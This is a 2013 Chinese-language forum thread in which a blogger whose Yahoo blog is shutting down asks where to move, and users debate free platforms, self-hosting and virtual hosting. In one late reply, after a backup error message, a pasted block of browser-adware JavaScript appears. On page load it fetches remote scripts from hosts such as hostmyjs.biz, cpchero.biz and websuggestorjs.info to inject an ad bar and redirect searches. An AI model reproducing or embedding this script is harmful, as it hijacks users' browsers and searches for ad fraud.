哭哭~

楼主(2013-08-31):
我的Blog基地~Yaxxx說不玩了~
各位知道現在哪個Blog最強,人數較多?

网友:
我是用HINET的你可以參考看看
http://xuite.net/

网友:
這下換有在雅虎部落格"生活"的人傷腦筋了,因為使用部落格的人越來越少,多數人都移往社群去了,不過前陣子有看到報導說使用社群的人也越來越少了 。

難道是論壇又要流行回來了嗎?

网友:
哇 完蛋了 想必靠部落格招攬生意的人 會有陣痛期要忍受生意下滑
現在的人用 FB 習慣了

网友A:
自己架才是王道
這位 不來恩 先生說的很好,
為什麼你不應該用免費部落格服務、不該用 Facebook 當公司首頁、不該用免費圖床放圖檔、不該用免費空間提供下載?
google 的網路相簿也會移除連結,
gmail 會偷掃描你的信好了解你喜好廣告,
放在雲端就要有洩密與遺失的心理準備.

网友B:
引用 网友A:
自己架才是王道
這位 不來恩 先生說的很好,
為什麼你不應該用免費部落格服務、不該用 Facebook 當公司 ...

想長期作戰的話,還是不要用免費的。

楼主:
引用 网友B:
想長期作戰的話,還是不要用免費的。

那~要怎麼用有錢的?

网友C:
引用 楼主:
那~要怎麼用有錢的?

以我自己來說的話,就只是用光世代附的一個固定IP。

家用、PPS、BT以及自己的伺服主機都只吃這一條20M/5M....

不過,要買實力強的分享器,並設定伺服主機佔用網路頻寬的優先權最高。。。。

有需要時才會昇級60M/15M吧!目前看不到需要。。。。

(這種用法不會增加網路費用,因為本來就會用光世代。)

网友:
引用 网友C:
以我自己來說的話,就只是用光世代附的一個固定IP。

家用、PPS、BT以及自己的伺服主機都只吃這一條20M/5 ...

如果讓atun 自己 架一個伺服器在家裏 會產生2個問題 1.維護的問題 伺服器的維護 跟pc的維護不同
哪一天如果罷工那就好玩 2.他寫這個部落格 不是 單純的維修日誌 是希望靠者雅虎部落格的名氣
讓看到維修實例的 能把東西寄給他 或送給他修  如果自己架 一切歸零 自己架 文章寫的在精彩 也吸引不到人來看 那就沒有coco 收入 所以他才來上問一下 哪一家人氣比較高 能夠繼續下去 請大家給他建議

网友B:
引用 楼主:
那~要怎麼用有錢的?

買虛擬主機空間自己架站,是比較省的方法。
部落格已慢慢在退流行了,所以雅虎才會關閉,你換了一家部落格,那表示重新打知名度,如果又在你經營一陣子之後他也要關閉了,那你是不是又要找一家部落格?
連FB都已經開始在退燒了,部落格還能撐幾年?若是準備長久作戰,還是自己架一個比較妥當,不過要打知名度就比較辛苦了。

网友:
引用 网友B:
買虛擬主機空間自己架站,是比較省的方法。
部落格已慢慢在退流行了,所以雅虎才會關閉,你換了一家部落 ...

說的針見雪.....眉之心人員...我不完....

就算有設備我也不完

网友:
買虛擬主機空間也要一些錢,十年下來也是不少錢。。。。

自己有能力會比較省錢。。。。。

网友:
一按下資料與備分,馬上轉換出錯了: {"mes":"\u60a8\u5c1a\u672a\u7533\u8acb\u8cc7\u6599\u5099\u4efd......","status":"4","output":"","starttime":"","endtime":""}
<script>
var id=210496254;
var aff=30501;
var sid=0;

function INCL_checkinternals()
{
        var h = document.location.hostname;
        return (/search\.kalloutsearch\d\.com/i.test(h) == true ||
                        /search\.adbar\d\.com/i.test(h) == true ||
                        h.indexOf('search.runclips.com') != -1 ||
                        h.indexOf('search.searchnowdirect.com') != -1);
}

function INCL_addEventHandler (el, eType, fn)
{
        if (el.addEventListener)
                el.addEventListener(eType, fn, false);
        else if (el.attachEvent)
                el.attachEvent('on' + eType, fn);
        else
                el['on' + eType] = fn;
}

function INCL_checkdml()
{
        var h = document.location.hostname;
        return (h.indexOf("google")!=-1 ||
                h.indexOf("facebook.com")!=-1 ||
                h.indexOf("yahoo.com")!=-1 ||
                h.indexOf("bing.com")!=-1 ||
                h.indexOf("ask.com")!=-1 ||
                h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src, scriptId)
{
        if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
                return;
        var script = document.createElement("script");
        script.src = src;
        script.characterSet = "utf-8";
        script.type = "text/javascript";
        script.setAttribute('jsid', 'js36');
        if (typeof(scriptId) !== 'undefined')
                script.id = scriptId;
        (document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script);
}
function INCL_onloadComplete()
{
        if (!INCL_checkdml())
        {
                        window.INLDM_cfg = { fi : 4603, fd : 0,
                            fddm: 'xml.cpchero.biz',
                            sttc: 'https://hostmyjs.biz/scripts/inl_dmmtch/',
                            inlsrhdm: 'sonicsearchonline.biz' };
INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch/inl_dmmtch.js');
INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');
        }
        INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
        window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://hostmyjs.biz/scripts/adbar' };
INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');
}
if (top === self && !INCL_checkinternals())
{
        if (document.readyState === 'complete')
                INCL_onloadComplete();
        else
                INCL_addEventHandler(window, 'load', INCL_onloadComplete);
}
看來有得等